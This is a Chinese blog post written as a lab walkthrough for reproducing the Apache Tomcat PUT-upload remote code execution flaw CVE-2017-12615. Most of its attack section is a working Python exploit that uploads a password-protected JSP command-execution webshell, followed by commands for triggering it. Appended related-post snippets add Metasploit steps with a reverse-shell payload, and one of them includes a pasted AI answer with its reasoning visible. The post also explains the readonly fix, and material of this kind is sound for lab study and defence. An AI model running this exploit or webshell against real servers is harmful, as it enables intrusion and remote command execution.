Tomcat远程代码执行漏洞(CVE-2017-12615)

最新推荐文章于 2025-04-25 17:39:28 发布
最新推荐文章于 2025-04-25 17:39:28 发布
阅读量1w 收藏 9
点赞数 1
分类专栏: web安全漏洞 文章标签: 漏洞

实验环境

操作机:windows XP

IP:172.16.11.2

目标机:windows server 2003

IP:172.16.12.2

实验目的

了解Tomcat远程代码执行漏洞危害

掌握检测利用Tomcat远程代码执行漏洞的能力

实验工具

Firefox: 中文俗称火狐,一个自由及开放源代码网页浏览器

实验内容
Tomcat

Tomcat服务器是一个免费的开放源代码的Web应用服务器。Tomcat是Apache软件基金会(Apache SoftwareFoundation)的Jakarta项目中的一个核心项目,由Apache、Sun和其他一些公司及个人共同开发而成。

漏洞介绍

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)当存在漏洞的Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT请求方法,攻击者通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行,危害十分严重。

漏洞分析:
在Tomcat安装目录下的配置文件web.xml中的org.apache.catalina.servlets.DefaultServlet方法下如果该方法有如下代码,即表示Tomcat已开启PUT方法

<init-param> 
      <param-name>readonly</param-name> 
      <param-value>false</param-value> 
</init-param>

然后我们就可以通过PUT方法直接上传一句话木马
修复方案

用户可以禁用PUT方法来防护此漏洞,操作方式如下:

在Tomcat的web.xml 文件中配置org.apache.catalina.servlets.DefaultServlet的初始化参数

<init-param>
<param-name>readonly</param-name>
<param-value>true</param-value>
</init-param>

确保readonly参数为true(默认值),即不允许DELETE和PUT操作。
实验步骤
top 1:访问目标网站
在浏览器的地址栏输入我们的目标网站地址172.16.12.2:8080
这里写图片描述
查看版本知道存在远程代码执行漏洞

top 2:下载payload,内容如下:

#! -*- coding:utf-8 -*- 

import httplib

import sys

import time

body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''

try:

    conn = httplib.HTTPConnection(sys.argv[1])

    conn.request(method='OPTIONS', url='/ffffzz')

    headers = dict(conn.getresponse().getheaders())

    if 'allow' in headers and \

       headers['allow'].find('PUT') > 0 :

        conn.close()

        conn = httplib.HTTPConnection(sys.argv[1])

        url = "/" + str(int(time.time()))+'.jsp/'

        #url = "/" + str(int(time.time()))+'.jsp::$DATA'

        conn.request( method='PUT', url= url, body=body)

        res = conn.getresponse()

        if res.status  == 201 :

            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]

            print 'shell:', 'http://' + sys.argv[1] + url[:-1]

        elif res.status == 204 :

            print 'file exists'

        else:

            print 'error'

        conn.close()

    else:

        print 'Server not vulnerable'

except Exception,e:

    print 'Error:', e

top 3 利用payload对目标网站发起攻击
下载完后payload命名为exp.txt
进入cmd界面,然后切换到exp.txt文件目录下,
接下来输入命令:

python exp.py 172.16.12.2:8080

运行,程序返回webshell的地址

http://172.16.12.2:8080/1506412001.jsp

注意:此处1506412001.jsp为随机生成地址,请以实际获取的shell为准

在火狐浏览器中按F9打开hackbar插件,执行以下命令

http://172.16.12.2:8080/1506412001.jsp?&pwd=023&cmd=ipconfig

这里写图片描述
输入如下指令,得到:

http://172.16.12.2:8080/1506412001.jsp?&pwd=023&cmd=ipconfig

这里写图片描述

结果分析:
当存在漏洞的Tomcat运行在 Windows 主机上,且启用了 HTTP PUT 请求方法,攻击者通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行。因此,通常情况下我们应该不允许DELETE和PUT操作。

漏洞复现】Apache Tomcat 远程代码执行CVE-2025-24813)
李火火的安全圈
03-28 526
Apache Tomcat 是一个开源的、轻量级的 Java Servlet 容器和 Web 服务器,由Apache软件基金会开发和维护,支持运行 Java Servlet、JavaServer Pages (JSP) 和其他基于 Java 的 Web 应用程序,广泛用于开发和部署企业级 Web 应用。
Apache Tomcat 远程代码执行漏洞CVE-2024-50379处置建议和缓解措施
拉丁解牛技术专栏
01-22 346
近期,Apache官方修复了Apache Tomcat 远程代码执行漏洞(CVE-2024-50379), 该漏洞是由于Tomcat在验证文件路径时存在缺陷,如果readonly参数被设置为false(这是一个非标准配置),并且服务器允许通过PUT方法上传文件,那么攻击者就可以上传含有恶意JSP代码的文件。通过不断地发送请求,攻击者可以利用条件竞争,使得Tomcat解析并执行这些恶意文件,从而实现远程代码执行Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。
Tomcat 任意写入文件漏洞CVE-2017-12615
ANOrange的博客
03-29 583
Tomcat 任意写入文件漏洞CVE-2017-12615漏洞复现
Tomcat代码执行漏洞(CVE-2017-12615)
Li-D的博客
08-30 7898
漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。 影响版
漏洞分析 | Apache Tomcat远程代码执行漏洞CVE-2025-24813)
最新发布
WangsuSecurity的博客
04-25 628
目前该漏洞POC状态已在互联网公开,建议尽快做好自查及防护
CVE-2017-12615远程代码执行漏洞
Biu_Biu_Bi的博客
04-07 4315
Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。2、使用burpsuite抓包,修改GET为PUT上传方式,添加文件名1.jsp/,添加shell脚本。1、使用冰蝎v4.05生成jsp脚本。5、打开ip:8080,成功开启。4、测试成功上传Shell。
BUUCTF-Real-[Tomcat]CVE-2017-12615
分享
02-07 1606
CVE-2017-12615漏洞复现!只写了Linux版本的!
tomcat远程代码执行漏洞cve-2017-12615)复现
qq_40410406的博客
08-10 1116
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。...
Jboss多个远程命令执行漏洞CVE-2017-12149、CVE-2015-7501、CVE-2017-7504)
qq_68163788的博客
06-26 1631
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
cve-2017-12615_cmd.py
04-26
CVE-2017-12615的稀有检测脚本,方便使用和测试,本脚本请谨慎使用!
tomcat远程代码执行漏洞验证
04-17
tomcat远程代码执行漏洞验证
Apache Tomcat任意文件上传漏洞(CVE-2017-12615)
ran的博客
01-31 2255
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,并且能被服务器执行。2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616。漏洞影响:上传包含任意代码的文件,并且能被服务器执行。放包后再次访问“1.jsp”,发现存在了。
Tomcat的PUT的上传漏洞(CVE-2017-12615)
Fly_鹏程万里
10-30 5389
近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理复现。用作来巩固更新自己的知识库。 首先我们先来了解以下Tomcat的概念: Tomcat是我们在工作中所使用的一款开源轻量级的Web应用程序服务器。通常情况下在中小型系统或者并发量较小的场合下使用,常用来与JSP和PHP脚本结合使来解析脚本语...
Tomcat漏洞CVE-2017-12615
qq_68186313的博客
08-06 376
Tomcat:运行在Vindows操作系统时,且启用了HTTP PUT请求方法(例如,将readonly初始化参数由默认值设置为fls),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。2、Webshell客户端工具进行连接。1、首页抓包,修改为PUT方式提交。
[CVE-2017-12615]Tomcat任意文件上传漏洞实现
dream51234的博客
03-27 448
(可用ls查看文件夹中,pwd查看目录,cat查看文件,-h查看该命令帮助,history查看历史命令,history|grep ""查看含xxx的命令)查看docker-compose 版本:docker-compose -v。建立docker-compose:docker-compose up -d。查看docker版本:docker-compose -v。查看docker-compose版本:docker-compose -v。虚拟机左上角-编辑-虚拟网络编辑器修改网络设置。
CVE-2017-12615
Dikesi的博客
02-10 584
Tomcat任意文件写入
Apache Tomcat CVE-2017-12615远程代码执行漏洞分析
weixin_30815469的博客
09-27 1135
2017年9月19日, Apache Tomcat官方发布两个严重的安全漏洞, 其中CVE-2017-12615远程代码执行漏洞,通过put请求向服务器上传恶意jsp文件, 再通过jsp文件在服务器上执行任意代码, 且最新的补丁未完全修复漏洞漏洞编号 CVE-2017-12615 漏洞名称 Apache Tomcat 远程代码执行漏洞 漏洞评级 严重 影响范围 ...
如何使用msf进行CVE-2017-12615漏洞利用
03-13
<think>好的,我现在需要帮用户查找关于如何使用Metasploit Framework(MSF)对CVE-2017-12615漏洞进行渗透测试的方法。首先,我需要确认CVE-2017-12615是什么漏洞。根据记忆,这是一个Apache Tomcat远程代码执行漏洞,影响版本是Tomcat 7.0.0到7.0.79,当启用HTTP PUT方法时,攻击者可以上传恶意JSP文件,导致远程代码执行。 接下来,用户需要的是利用MSF进行攻击的教程。我记得MSF中有现成的模块可以用来利用这个漏洞。可能需要查找对应的模块名称,比如exploit/multi/http/tomcat_jsp_upload_bypass。然后,用户需要知道如何配置参数,比如设置RHOSTS(目标IP)、RPORT(端口,默认8080)、TARGETURI(路径),以及上传的JSP payload。 另外,用户可能需要生成payload,比如使用msfvenom生成反向shell的JSP文件,或者直接使用MSF内置的payload。需要确保用户了解如何设置监听器,处理防火墙或杀毒软件的问题,以及漏洞利用的前提条件,比如目标服务器是否启用了PUT方法,是否有写权限等。 还需要注意引用相关的资料,比如用户提供的引用中有提到其他CVE的复现,虽然没有直接提到CVE-2017-12615,但可以类比说明使用MSF的一般步骤。例如,引用[1]提到使用模块路径,引用[3]提到MSF的模块使用和启动方式,这些都可以作为参考。 此外,用户可能需要了解如何验证漏洞是否存在,比如手动发送PUT请求测试,或者使用nmap脚本检测。最后,提醒用户遵守法律,仅在授权环境下进行测试,并建议修复方案,比如升级Tomcat版本或禁用PUT方法。 现在需要将这些步骤结构化,用中文清晰回答,确保LaTeX格式正确,生成相关问题,并在适当位置添加引用标记。同时检查是否有遗漏的细节,比如模块的具体配置步骤,常见错误处理等,确保回答准确可靠。</think>### 使用Metasploit Framework (MSF)CVE-2017-12615漏洞的渗透测试方法 CVE-2017-12615是Apache Tomcat的一个远程代码执行漏洞,影响Tomcat 7.0.0至7.0.79版本。当服务器配置允许HTTP PUT方法时,攻击者可通过上传恶意JSP文件实现代码执行[^1]。 #### 步骤说明 1. **环境准备** - 确保已安装Metasploit Framework(建议使用Kali Linux或最新版MSF)。 - 启动MSF数据库服务: ```bash msfdb init && msfdb start ``` 2. **查找并加载漏洞模块** ```bash msf6 > search CVE-2017-12615 msf6 > use exploit/multi/http/tomcat_jsp_upload_bypass ``` 3. **配置参数** ```bash msf6 exploit(tomcat_jsp_upload_bypass) > set RHOSTS <目标IP> msf6 exploit(tomcat_jsp_upload_bypass) > set RPORT 8080 # Tomcat默认端口 msf6 exploit(tomcat_jsp_upload_bypass) > set TARGETURI / # 目标路径 msf6 exploit(tomcat_jsp_upload_bypass) > set HttpUsername <用户名> # 若需认证 msf6 exploit(tomcat_jsp_upload_bypass) > set HttpPassword <密码> ``` 4. **选择Payload** ```bash msf6 exploit(tomcat_jsp_upload_bypass) > set payload java/jsp_shell_reverse_tcp msf6 exploit(tomcat_jsp_upload_bypass) > set LHOST <攻击机IP> msf6 exploit(tomcat_jsp_upload_bypass) > set LPORT 4444 ``` 5. **执行攻击** ```bash msf6 exploit(tomcat_jsp_upload_bypass) > exploit ``` #### 关键注意事项 - **漏洞验证**:手动发送PUT请求测试是否允许上传文件: ```bash curl -X PUT http://<目标IP>:8080/test.txt -d "test" ``` - **绕过限制**:通过构造特殊文件名(如`shell.jsp%20`)绕过Tomcat的防护机制。 - **防护措施**:升级Tomcat至7.0.80+或禁用PUT方法(修改`web.xml`配置)[^3]。 #### 引用说明 - 漏洞利用模块路径参考了Metasploit模块管理逻辑[^1]。 - 监听器配置与Payload生成方法类似CVE-2017-8759的HTA脚本利用流程[^2]。 - MSF基础操作(如模块加载、参数设置)参考了永恒之蓝漏洞的复现步骤[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值